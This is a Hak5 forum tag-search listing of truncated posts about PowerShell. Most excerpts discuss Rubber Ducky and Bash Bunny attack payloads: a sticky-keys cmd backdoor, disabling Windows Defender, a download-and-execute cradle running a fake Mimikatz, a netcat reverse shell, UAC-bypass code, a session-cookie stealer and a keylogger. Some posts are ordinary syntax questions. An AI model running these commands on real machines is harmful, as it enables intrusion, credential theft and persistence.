Jump to content

Search the Community

Showing results for tags 'powershell'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud CĀ²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. Has anyone addressed or had problems with running scripts on PowerShell. As the default on my windows 10 64bit all the lastest updates disables running of scripts, this can be changed with the Set-ExecutionPolicy but this needs Administrator access to change. Am I missing something really simple!?
  2. Sharkjack.ps1 This is a rewritten (Windows) PowerShell version of Hak5's "sharkjack.sh". Compliments to Hak5 for the Device and the original script. I only take credit for rewriting the script to support Windows. Please Note: SharkLib Options are DISABLED until Hak5 merges SharkLib into the GitHub. If you are having problems getting the file to run. See Post #3. (If you have multiple SharkJacks, type "clearssh" in menu to clear your "known hosts" SSH File of the SharkJack's Fingerprint. Then try to reconnect using SSH via option #5) sharkjack.ps1 # Title:
  3. Hey I am super new to this, so forgive me if there is another payload like this, I looked around but could not find anything like it just yet. The payload copies CMD.exe to sethc.exe allowing you to press the shift key 5 times to open up a cmd line. Though the attack must be carried out when the user is logged in, you can still open the cmd line the same way even on the login screen. Let me know what you guys think, It's my first payload so I would appreciate any constructive criticism and any idea on how to make it better. https://github.com/InvaderSquibs/BashBunny/tree/master/payloads/li
  4. Hey everyone I'm trying to get a reverse shell using rubber ducky as Darren's video but in Windows 10. My problem is when I execute powershell_reverse_shell.ps1, windows defender refuse me. How can i disable windows defender through powershell command ? I found this "Set-MpPreference -DisableRealtimeMonitoring $true" but nothing happens. I'm from Argentina and is a little difficult for me so if someone else can help me. I will be so happy
  5. Hi This is my first question here hope someone can help I have converted puty.exe to putty.vbs and also I have also tried convert the exe to base64 Im trying to download (both vbs and base64 exe) it but Im not being able to succeed the vbs is on "https://www.codepile.net/raw/rjzpdEKZ.vbs" but https://www.codepile.net/raw/rjzpdEKZ works too I have tried 1 - IEX (new-object net.webclient).downloadstring("https://www.codepile.net/raw/rjzpdEKZ") 2 - Invoke-Expression -Command $([string]([System.Text.Encoding]::Unicode.Ge
  6. Hi everybody! So I'm simply trying some download cradles on powershell on a Windows 7. I wanted to download this test powershell script (fake Mimikatz) : https://pastebin.com/FvASwLVQ that runs calculator and print some random informations and I wanted to run the main function. So I run the following command : powershell -c "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds" And immediatly after that nothing happens I'm still on the same Powershell and I can't open a a new Powershell console by any means unless I restar
  7. Link to my original reddit post So how do we create such reverse shell? Well, first of all you need to download netcat 1.12 and extract the nc64.exe. Once you got it extracted upload it to some file-hosting service of your choice, which provides DIRECT LINK (very important!!). I used Discord, works like charm and link doesn't expire. Second, you need to make yourself an .XML file which you're gonna need later for Task Scheduler. I believe scheduled tasks are rly good way to set up persistence, as well as escelating t
  8. In theory, this bash bunny script should make a directory in C:\Windows called uac-bypassed I have no way to test this specific script because I don't have a bash bunny or a rubber ducky, so I had to make do with a P4wnP1 A.L.O.A. any help making this payload smaller would be greatly appreciated. (The command at the bottom is for the P4wnP1 A.L.O.A) Q GUI R Q powershell Q ENTER Q DELAY 500 Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\";
  9. Hi everyone! First of all, sorry if my English is not that good, It's not my main language. I just signed up to the forum to post this, after watching the video Darren made about a payload that changes the Desktop background. I had this idea after he mentioned that the Lockscreen background could not be changed due to the fact that there isn't a "stable" method and it needed admin privileges. So I made a script which, when opened as standard user, respawns itself in a hidden window with full admin privileges and executes whatever payload you put in it. Here it is: if((([Syst
  10. Slydoor Passing Powershell scripts to victim PCs via USB storage. Hey guys, here comes my second payload! This payload passes scripts to a user PC via USB storage (possibly more options coming in future) and HID injection. Target: Windows 7, 8, 8.1, 10 Dependencies: File 'a.ps1' - This is the script that is initiated to run other scripts (requires Admin privileges) Features: Modes: - Payload 'modes' are .ps1 files in the payload directory, allowing you to create your own 'modes' and configure the payload to run them - Slydoor, by default, comes with 2
  11. Hello! I have a question. How to download shell from powershell (from win+r). Can someone write me a command to bunny?
  12. Hi, Based on the powershell script written to extract creds from Google Chrome, I made a script to read the SQLite database where the cookies are stored and extract Facebook session cookies. It uses no library, like in the ChromeCreds payload, I use regex to search for the cookies. I haven't written any payload, and I also want to do the same with Firefox. http://pastebin.com/25Z8peMb Enjoy
  13. Hello friends! Today I am going to show you a very simple 11 line USB Rubber Ducky Keylogger hack using powershell! Super simple. What this does is it starts a powershell as a hidden window, so the actual application will not be visible on the taskbar. Only through the Task Manager. Then it downloads a simple script from github into memory, then executes the keylogger command. The second to last line, after "-LogPath" input the location you want it to place the keylog file. And the "-Timeout" command is how many minutes you want to command to run. Here is the code: DELAY 500
  14. Hello all! I would your help to solve an issue , nothing in loot folder. i already see mentioned into many posts but really got no a solution from here. Hands on a a Fresh NEW Bash Bunny with an outdated firmware ,windows 7 Ultimate x64 Pc. Keyboard settings are US for win7, and from factory in BB. If i open config.txt i read just: #!/bin/bash #This configuration file is used to set default variables DUCKY_LANG us Go ahead Updated the firmware, downloading the updater here https://bashbunny.com/setup , the payloads library and all will be updated too
  15. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the exec
  16. So, it has been a bit since I did any work on the BBTPS so posting some work I began doing on it. First, I have gotten some messages about the BBTPS needing to use npm to get Express before adding to Bunny. If you pull the No_Express branch, you will only need to copy it to the Bunny. No Node dependencies needed. That one had the web server rewritten to use core modules instead of addons. First, current bug: If your script is huge and you specify it to be a process, it may not run. This is due to the cmdline 8191 character limit. The process launcher in the BBTPS launches a
  17. Hi there, I was wondering how the powershell based bunny payloads that load powershell-script-files from either the smb or the webservice of the bunny could circumvent the system wide proxy. The problem is that the proxy - obviously - is unable to connect to the bunny-IP and the payload fails. The current versions of the payloads does not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the bunny and to use it in all other requests which is powershell default. I am currently unaware of a good solution to circumv
  18. Hi all, This works fine... Get-WMIObject -Class Win32_UserProfile | Select -Expandproperty LocalPath However, the following does not. What am I doing wrong with the syntax here? Get-WMIObject -Class Win32_UserProfile | where {($.LocalPath -eq 'C:\Users\JoeBloggs')} $.LocalPath : The term '$.LocalPath' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:50 + Get-WMIObject -Class Win32_UserProfile | wh
  19. In order to provide a PoC that non-administrative access still can result in huge data breaches I present to you The Hidden PP Attack A one liner PoSh command that can be executed from a Teensy/Rubber Ducky which leaves the machine open to injections of PoSh code remotely. Quite happy with this project so I thought id drop it here. Ive lurked remotely without an account for some time without contributing, so... here you are https://simpleinfosec.com/2018/01/09/the-hidden-pp-attack-a-non-administrative-remote-shell-for-data-exfiltration/ https://github.com/secsi/HIDdenPPAtta
  20. For a larger project, I am exploring the use of Powershell to automate network tasks. In the enclosed script, I am assuming someone has a Raspberry Pi named PiM3.local with default username and password on my local network. I use Posh-SSH which can be installed within Powershell by Install-Module Posh-SSH . I then execute a command with SSH, grab the .bash-history and put a new file in the Pi. One could, of course, use nmap to find computers with port 22 and then proceed with something like this to see what happens. One could of course use the wifi pineapple to ... and so on. Are th
  21. Hello everyone! I recently ordered a Rubber Ducky and while I wait for it to get here I thought I would start setting up a script. What I want to do in short is the following.. 1. Open Powershell as Admin āœ” 2. Bypass UAC āœ” 3. Change the PS window size āœ” 4. Open Google Chrome in a NEW window, not as a new tab. The reasoning behind this is because I would like to open the Chrome window in front of the PS window so it can be hidden during script execution. I would potentially even want to open 3 or 4 tabs in the new window. I spent quite a bit of time trying to fig
  22. Hi all, I'm creating a PowerShell script and am attempting to use; "$variable1,$variable2,$variable3" | Add-Content -Path "file.csv" -Encoding UTF8 The variables echo/write-host as; Variable1 Hello Variable2 World Variable3 Hello World My issue is that the Add-Content above should create a CSV file like this; Hello,World,Hello World But it doesn't. Instead, it creates; Hello,World,Hello World How can I go about using Add-Content to export to CSV, but get it to ignore new lines? Opened in Excel, I want 'cell' C1 to b
  23. How does it work / what is it? I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky! This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. Tutorial: First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% upt
  24. Hey guys.. Can someone help me out with this cmdlet error ? I've flashed my duck with no probs.. No spelling error from the scripts. When i keyed this manually with win+r key... STRING powershell ".((gwmi win32_volume -f 'label=''_''').Name+'d.cmd')" It created a folder inside of slurp but with no files exfiltrated.. And whenever i tried to run the inject with twin duck(1).. I got this error popped out instead. Did i missed something here ? Thank you.
  25. { SetEnviromentVariable ("WGet", "$MyInvocation.MyCommand.Path", "Machine" ) } I've never coded in powershell but i do know a lot about batch. I would like some help with a toolkit i'm developing and i need a powershell script that will be in the install directory that will add the environment variable to the "Machine". I'm trying to automate the installation of Wget for Cmd as it's an essential for my toolkit. Any Help would be greatly appreciated Thanks, $tRiZzY
  • Create New...